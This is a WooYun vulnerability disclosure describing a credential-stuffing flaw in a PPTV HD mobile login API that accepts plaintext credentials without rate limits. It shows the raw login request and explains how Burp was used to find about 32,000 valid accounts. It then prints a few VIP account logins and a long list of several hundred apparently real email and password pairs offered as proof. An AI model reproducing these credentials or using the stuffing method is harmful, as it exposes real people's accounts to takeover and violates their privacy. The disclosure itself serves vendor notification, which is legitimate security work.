当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112309

漏洞标题:PPTV某接口设计不当可导致大规模撞库:妈妈再也不用担心我看电视没会员了之二(账号证明)

相关厂商:PPTV(PPlive)

漏洞作者: 路人甲

提交时间:2015-05-06 10:29

修复时间:2015-06-20 11:32

公开时间:2015-06-20 11:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:14

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-06: 厂商已经确认,细节仅向厂商公开
2015-05-16: 细节向核心白帽子及相关领域专家公开
2015-05-26: 细节向普通白帽子公开
2015-06-05: 细节向实习白帽子公开
2015-06-20: 细节向公众公开

简要描述:

挖洞最苦逼的事莫过于编辑了半天的漏洞最后发现竟然不存在。。

详细说明:

前面几次的接口大都是在电脑端,已经fixed的差不多了,而且唯一一次大规模撞库还中途卡死了。。再挖没有挖到。。始终不甘心啊。。
谁让你目光短浅,只停留在电脑端的,屌丝活该你挖洞挖不到,对啊,这一次的接口在PPTV的HD端~
首先下载PPTV的HD端,看到登陆的地方没有任何限制

1.jpeg


然后呢?然后我就淫荡一笑,开始抓包~发现用户名和密码全部都是明文传输的,果然是一个新的接口~

2.png


接口请求:

GET /v3/login/ex_login.do?username=bklm1%40qq.com&password=aaayun123&format=xml&from=apd&version=3.0.1&uid=864783020281941 HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Lenovo A808t Build/KOT49H)
Host: api.passport.pptv.com
Connection: Keep-Alive
Accept-Encoding: gzip


然后开始撞库咯,上次撞到中途卡死了,刚刚在zone悬赏了我2大WB换来的如何有效避免burp卡死的方法,肯定不能白花wb啊,试试方法管用不管用咯~
嘿咻嘿咻的撞完了,字节长度1800+的都是成功的哦,先看一下burp的比例:

3.png


然后导出后粗略计算了一下差不多是32000+的用户~

4.png


5.png


上次VIP不够用?没关系,这次还有好多~放出几个:
账号:rbptgpwg 密码:134078

6.png


账号:vhuoshjv 密码:516798

7.png


账号:juh841588 密码:20150411

8.png


这个是刚刚想到挖到的,本来想等上一个fixed了再发出来的,但是想了想还是直接发出来吧,一起修复比较省力气嘛(看我多为运维大大着想-v-好意思不给高rank嘛你~)~

漏洞证明:

如上咯,发出一些用户名和密码试试咯(上次说放出的用户名和密码太多,外面看漏洞的又看不到,又不会泄露- -这次就少放出一点证明一下吧)~

1105085077@qq.com	q2q2q2	1894
www.mingyu@qq.com	123478044	1894
196725684@qq.com	19901221	1894
yanyanhappy1314@qq.com	123456	1894
254692109@qq.com	254692109	1894
125704332@qq.com	a2623482	1894
tt8027@qq.com	tt8027	1894
348948374@qq.com	123456	1894
138130025@qq.com	15031558	1894
radish2003@qq.com	57071854	1894
367189439@qq.com	135258	1894
304420882@qq.com	5201314	1894
147177716@qq.com	330302	1894
415314767@qq.com	415314767	1894
chenmiaohong@vip.qq.com	13593628385	1894
75888767@qq.com	4622143	1894
287192051@qq.com	1069419	1894
513414286@qq.com	5112960	1894
wanghui880@qq.com	yaoaihong	1894
83775773@qq.com	wodetaiyang	1894
281609497@qq.com	6628260504	1894
727142461@qq.com	36511239	1894
574125693@qq.com	709394	1894
1032656015@qq.com	309919	1894
81254292@qq.com	81254292	1894
10019735@qq.com	962178	1894
39911487@qq.com	8285209	1894
764254789@qq.com	wangshutian	1894
101156235@qq.com	75395121	1894
153314615@qq.com	63473222	1894
weikangtiancai@qq.com	5735155	1894
250289808@qq.com	172816	1894
79700718@qq.com	881001	1894
victor.star@qq.com	185824668	1894
352439575@qq.com	frank40371	1894
109648479@qq.com	123654	1894
71801191@qq.com	123456	1894
175214151@qq.com	1986106	1894
chenlei880815@qq.com	5201314	1894
527752396@qq.com	19860624	1894
309207971@qq.com	buzhidao	1894
583798879@qq.com	1989zzj8	1894
107594@qq.com	linboyu	1894
mumuyuki@qq.com	356217521	1894
353165819@qq.com	353165819	1894
511540959@qq.com	0907jk007	1894
2149933@qq.com	woshiliuxu	1894
luochencai@qq.com	85651373	1894
chenxu6801018@qq.com	cx6801018	1894
495248124@qq.com	920126	1894
shidifen2008@qq.com	ashi475	1894
65669376@qq.com	5334463	1894
631770132@qq.com	66779798	1894
819040092@qq.com	303787	1894
406590013@qq.com	406590013	1894
joxey379393470@vip.qq.com	jiangyilei	1894
476603410@qq.com	8583926	1894
hadeswarrior@vip.qq.com	52613344	1894
409127251@qq.com	661234	1894
empire99@vip.qq.com	23000320	1894
629814108@qq.com	888888	1894
tianxin700@vip.qq.com	5211314	1894
86284122@qq.com	259571	1894
418569412@qq.com	pengpeng	1894
739527840@qq.com	Rodger	1894
532822222@qq.com	19860202	1894
332006086@qq.com	137052	1894
138811989@qq.com	47735383	1894
357097790@qq.com	luo6526504	1894
390237961@qq.com	justinlin	1894
936793627@qq.com	wangzl555	1894
356324682@qq.com	67599186	1894
13698600@qq.com	marvin	1894
462260258@qq.com	abc7766780	1894
395708072@qq.com	liuyanzhi	1894
258283531@qq.com	3321411	1894
zhang773723532@qq.com	15950028100	1894
568886688@qq.com	741852963	1894
qinkai6@qq.com	5845211314	1894
357805547@qq.com	24102895	1894
308978271@qq.com	308978271	1894
543847869@qq.com	1989830	1894
271021115@qq.com	lampard	1894
159900415@qq.com	123456	1894
530997765@qq.com	45422086	1894
122159325@qq.com	122159325	1894
zhaozhen_6976@qq.com	qijian1987528	1894
83556370@qq.com	3248798	1894
917755591@qq.com	mizuno12121012	1894
298520995@qq.com	9101250	1894
316326675@qq.com	7769553	1894
350884621@qq.com	977212	1894
312733702@qq.com	2204800	1894
93697110@qq.com	woaiwoaini	1894
12312312@qq.com	123123	1894
278419685@qq.com	3390058	1894
659676147@qq.com	743521	1894
menxiaoliang@qq.com	3025223	1894
273453065@qq.com	123456	1894
494280831@qq.com	502502	1894
148351410@qq.com	19880530	1894
153841129@qq.com	890329	1894
hwh240107278@qq.com	hwh306306	1894
270184794@qq.com	19861212	1894
417319581@qq.com	123456	1894
sdf@qq.com	111111	1894
869606345@qq.com	7241208359	1894
80834694@qq.com	5394703	1894
459609214@qq.com	113113113	1894
424389330@qq.com	19840909	1894
516930998@qq.com	910804	1894
516258037@qq.com	2231207	1894
176426264@qq.com	1111111111	1894
chendongmp3@qq.com	chendong	1894
568106761@qq.com	709394	1894
379327843@qq.com	929939	1894
chengjinwu008@qq.com	7242012	1894
369564216@qq.com	83015750	1894
284700282@qq.com	1341332990	1894
84658727@qq.com	wutiejun	1894
358110320@qq.com	358110320	1894
93529172@qq.com	40973487	1894
675564343@qq.com	166320239	1894
ddiaodemao@vip.qq.com	hotgod	1894
150372183@qq.com	joseph	1894
281567251@qq.com	yuxuan0201	1894
112138716@qq.com	56276797	1894
188201533@qq.com	265710	1894
317215138@qq.com	123456	1894
545831607@qq.com	xl19890506	1894
284007644@qq.com	13834565644	1894
624784814@qq.com	751100	1894
276138022@qq.com	753421	1894
80135919@qq.com	915123543	1894
352773266@qq.com	769394	1894
zhangjiankof@vip.qq.com	198691	1894
dingwenbo1984@vip.qq.com	dingwenbo	1894
273945128@qq.com	1989701	1894
19077290@qq.com	650758	1894
kongdewei@vip.qq.com	161465585	1894
578691913@qq.com	19871019	1894
460415657@qq.com	dandan	1894
549253610@qq.com	199012058	1894
494913337@qq.com	15031555521	1894
646436491@qq.com	liwenjun	1894
848519169@qq.com	2260221979	1894
280441571@qq.com	xtdnxtdn	1894
80264094@qq.com	caonima	1894
136329229@qq.com	19931112	1894
lxn2008@vip.qq.com	9800107761	1894
271851088@qq.com	xiaofeng0714	1894
450367098@qq.com	901030	1894
9394000@qq.com	zhangyan	1894
389244101@qq.com	56325632	1894
540601125@qq.com	5296210	1894
810119389@qq.com	8323789	1894
pw830426@qq.com	830426	1894
526684622@qq.com	qjxqjx	1894
287133096@qq.com	81281786	1894
236578593@qq.com	15880072142	1894
22570975@qq.com	21549362	1894
296409620@qq.com	2182286	1894
164407309@qq.com	hukailinhkl	1894
47735876@qq.com	6262298	1894
542822009@qq.com	1987826	1894
chenyujia147742850@vip.qq.com	zxc123456	1894
812202689@qq.com	198438	1894
848519169@qq.com	2260221979	1894
173475000@qq.com	173475000	1894
312205730@qq.com	123123	1894
308087858@qq.com	13919422205	1894
287693433@qq.com	laji1hui	1894
434503972@qq.com	2399498	1894
382477507@qq.com	1990703	1894
71903281@qq.com	gujiawen	1894
340290790@qq.com	1988104	1894
641538720@qq.com	641538720	1894
1014641881@qq.com	123456	1894
35786550@qq.com	319109	1894
xinxin_cheng@qq.com	19811114	1894
335382216@qq.com	65158561	1894
275890807@qq.com	3030058	1894
183843511@qq.com	123123	1894
609021848@qq.com	84167037	1894
214380320@qq.com	jjno2o	1894
156561344@qq.com	741882	1894
65987172@qq.com	3232363	1894
liuyu520@vip.qq.com	xuhaijiao520	1894
476084724@qq.com	jinggaoni8	1894
327691797@qq.com	kangta27	1894
271722065@qq.com	3888384	1894
389959325@qq.com	51102375	1894
871828848@qq.com	456654	1894
345566151@qq.com	showmethem	1894
517192517@qq.com	53488153	1894
419951463@qq.com	2821090	1894
366144537@qq.com	191021	1894
345292829@qq.com	5801735	1894
2291271@qq.com	aiguoguo	1894
915045546@qq.com	123111	1894
179060197@qq.com	qazxsw	1894
273296306@qq.com	6678423	1894
449348825@qq.com	115728	1894
282101542@qq.com	8280907	1894
254854140@qq.com	6363555	1894
317225281@qq.com	62654254	1894
946399498@qq.com	jb4811	1894
513169218@qq.com	bb199025	1894
525236597@qq.com	nokian81	1894
405995785@qq.com	1101201	1894
442114913@qq.com	981521	1894
724782463@qq.com	1987libin	1894
aiwode0750@qq.com	198676	1894
372542564@qq.com	z123456789	1894
406949802@qq.com	cs5211314	1894
417420889@qq.com	570530	1894
411873656@qq.com	zhangyalong117	1894
769790115@qq.com	810505	1894
jksdhu526@vip.qq.com	8320640	1894
552895321@qq.com	361527169	1894
88992020@qq.com	2220794	1894
412287995@qq.com	8967649	1894
591771907@qq.com	198425	1894
250182214@qq.com	8935184	1894
806247684@qq.com	www8858277	1894
181291580@qq.com	luoxin12	1894
406861720@qq.com	123456	1894
317622250@qq.com	5201314	1894
mowenyang111@vip.qq.com	mwy1987815	1894
250182214@qq.com	8935184	1894
289387987@qq.com	19891129	1894
492866389@qq.com	1989121	1894
ilovehy2008@vip.qq.com	ilovehy	1894
304489774@qq.com	304489774	1894
362412022@qq.com	4813290	1894
wwjiunongni@qq.com	7758521	1894
82193184@qq.com	123456	1894
ilovehy2008@vip.qq.com	ilovehy	1894
43851610@qq.com	841114	1894
67658194@qq.com	67658194	1894
a519228186@qq.com	526793166	1894
195895781@qq.com	112421521	1894
237025393@qq.com	237025393	1894
287472253@qq.com	8422511	1894
51466188@qq.com	85480846	1894
758908544@qq.com	114327	1894
nipo992333@qq.com	wobanima	1894
16748810@qq.com	94619461	1894
348948374@qq.com	123456	1894
916255336@qq.com	lijing	1894
78848333@qq.com	jie922	1894
276939266@qq.com	19911127	1894
875576041@qq.com	19729238	1894
313891959@qq.com	k81538456	1894
5653109@qq.com	2478777	1894
317778769@qq.com	2564765	1894
shandianmao@qq.com	19831105	1894
287534188@qq.com	123123123	1894
517291@qq.com	86605258	1894
zhangtn1120@vip.qq.com	ztn1120	1894
136347557@qq.com	137510	1894
188752057@qq.com	881213	1894
113648491@qq.com	7798217	1894
526562413@qq.com	100200	1894
185308130@qq.com	83264400	1894
672788121@qq.com	19810216	1894
117411371@qq.com	yougang	1894
676728578@qq.com	liangmaolin	1894
475008210@qq.com	19871109	1894
303114209@qq.com	303114209	1894
232000548@qq.com	4402110	1894
47857667@qq.com	4230225	1894
271731747@qq.com	833637911	1894
yuelongcn@qq.com	850103	1894
405098441@qq.com	123123	1894
304488793@qq.com	goodboy	1894
451645955@qq.com	15981246897	1894
531556444@qq.com	123456	1894
jinpu_913@qq.com	k4hvdq9tj9	1894
woailanzsj@qq.com	woailanzsj	1894
526924855@qq.com	wojiaocaiqi	1894
40079554@qq.com	20061231	1894
287501000@qq.com	yue0819	1894
646223664@qq.com	wangxining	1894
460397943@qq.com	8814050	1894
408117535@qq.com	8798653	1894
shenchuyang@vip.qq.com	5238319	1894
286493367@qq.com	19880515	1894
380459629@qq.com	1314521	1894
342778613@qq.com	520776520	1894
654114736@qq.com	6968088	1894
287501000@qq.com	yue0819	1894
499305421@qq.com	499305421	1894
zyadidas@vip.qq.com	zy861230	1894
9804528@qq.com	123456	1894
294215685@qq.com	9180022010	1894
776500269@qq.com	wo920617	1894
479830561@qq.com	82994441	1894
372545951@qq.com	1012christmas	1894
616466962@qq.com	110415530	1894
48854440@qq.com	123456	1894
63653448@qq.com	63653448	1894
656627052@qq.com	886655	1894
227762836@qq.com	1101100	1894
464830779@qq.com	1300seven	1894
641956440@qq.com	828449	1894
328891596@qq.com	328891596	1894
317325389@qq.com	8809557	1894
18652165@qq.com	13703270373	1894
287277858@qq.com	6662165	1894
37222183@qq.com	19820103	1894
121847602@qq.com	yuliyan	1894
18538563@qq.com	6215105	1894
308980464@qq.com	dejinmei	1894
316782917@qq.com	316782917	1894
171459547@qq.com	19850315	1894
zxc3332096@qq.com	3332096	1894
sdf@qq.com	111111	1894
494842123@qq.com	1235789	1894
1100572@qq.com	3026583	1894
593829972@qq.com	4844886	1894
475322133@qq.com	7638289	1894
398986226@qq.com	880904	1894
28139903@qq.com	28139903	1894
493953293@qq.com	8019368	1894
285505850@qq.com	41212779	1894
253850420@qq.com	sos010203	1894
514804008@qq.com	1989922	1894
www.554163123@qq.com	xyl98098	1894
469202149@qq.com	19870623	1894
cy19891116.com@qq.com	6331246	1894
286657496@qq.com	ss223416	1894
330812981@qq.com	feifei	1894
316365016@qq.com	123456789	1894
345770450@qq.com	111111	1894
422149460@qq.com	1234567	1894
616823913@qq.com	64204357	1894
422722094@qq.com	hjbhjb	1894
397967960@qq.com	397967960	1894
317548080@qq.com	13204457	1894
vipwangchuan@qq.com	wangchuan	1894
15001417@qq.com	750562	1894
514076844@qq.com	1992325	1894
190235949@qq.com	190235949	1894
332989145@qq.com	85144742	1894
573702967@qq.com	3223953	1894
49013@qq.com	21110011	1894
314430286@qq.com	123456	1894
110458426@qq.com	8674612	1894
549236138@qq.com	890102	1894
vagrantliulang@qq.com	555555	1894
853612999@qq.com	songyu	1894
djbinbinhaihai@vip.qq.com	19911016	1894
qianbo911@qq.com	qianbo911	1894
luolinlove@qq.com	334452188	1894
45782102@qq.com	ddbbll123	1894
573136400@qq.com	19870704	1894
937974591@qq.com	137910	1894
395631063@qq.com	529000	1894
26543459@qq.com	123456	1894
12345868@qq.com	12345868	1894
zhangxuetai@qq.com	88975252	1894
519278153@qq.com	zhjunfu	1894
songq001@qq.com	20000822	1894
wangzhicheng0322@vip.qq.com	948068232	1894
78116555@qq.com	fang5220	1894
879014125@qq.com	03d0918	1894
121397624@qq.com	123456	1894
985737800@qq.com	108597	1894
271907935@qq.com	123456	1894
qiuhongchi@qq.com	denverdan	1894
wushiqing520@qq.com	wushiqing	1894
234895839@qq.com	120020323	1894
7978613@qq.com	7978613	1894
155132798@qq.com	global	1894
jimmytang29@qq.com	tangxiao	1894
870224@qq.com	bh89757	1894
307233989@qq.com	307233989	1894
294105008@qq.com	19821013	1894
308128960@qq.com	7173095	1894
330816526@qq.com	330816526	1894
10261247@qq.com	zhanglin	1894

修复方案:

爱疯端应该也是有此类的撞库漏洞的,但是屌丝一枚没有爱疯,也就无法测试了,要不你给我个爱疯我给你试试?(纯属开玩笑。。)

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-06 11:30

厂商回复:

谢谢提供,正在修复中

最新状态:

暂无